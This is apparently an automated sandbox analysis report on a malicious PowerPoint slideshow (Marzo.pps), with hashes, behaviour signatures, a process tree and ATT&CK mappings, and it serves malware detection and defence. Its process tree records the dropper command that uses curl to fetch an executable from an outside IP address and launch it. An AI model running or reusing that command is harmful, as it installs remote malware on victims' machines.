Analysis

  • max time kernel
    120s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-03-2023 14:25

General

  • Target

    Marzo.pps

  • Size

    54KB

  • MD5

    a7b9fa984e5fc897da9871f5efea2aad

  • SHA1

    a1e4a02b1fb617ede5dba236642eedd7eb24df93

  • SHA256

    ca6cca63731e86074f4b715fd5ff280771c7478aa9e336267e8cc95cdf4905fe

  • SHA512

    10e1eaf4f11771e977ce7ffcaf2fb2a8bc8a260b47422561ffe782f71a6937def6c97dc949b58532513bba4e2cbf70685710eba34b442a002191f0c2dee8c5bd

  • SSDEEP

    384:XvA6kFP4VCa8KJKrhr09JrDucC9Q8UfTb:6FP4VCaJJMxIgcCVU

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 20 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\Marzo.pps" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3984
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c curl http://109.248.11.155/network.exe -o C:\Users\Admin\AppData\Roaming\update.exe & explorer C:\Users\Admin\AppData\Roaming\update.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:5092
      • C:\Windows\system32\curl.exe
        curl http://109.248.11.155/network.exe -o C:\Users\Admin\AppData\Roaming\update.exe
        3⤵
          PID:1600
        • C:\Windows\explorer.exe
          explorer C:\Users\Admin\AppData\Roaming\update.exe
          3⤵
            PID:5100
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:3176

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      3
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/3984-133-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-135-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-134-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-136-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-137-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-138-0x00007FFBA51B0000-0x00007FFBA51C0000-memory.dmp
        Filesize

        64KB

      • memory/3984-139-0x00007FFBA51B0000-0x00007FFBA51C0000-memory.dmp
        Filesize

        64KB

      • memory/3984-160-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-161-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-162-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB

      • memory/3984-163-0x00007FFBA7B10000-0x00007FFBA7B20000-memory.dmp
        Filesize

        64KB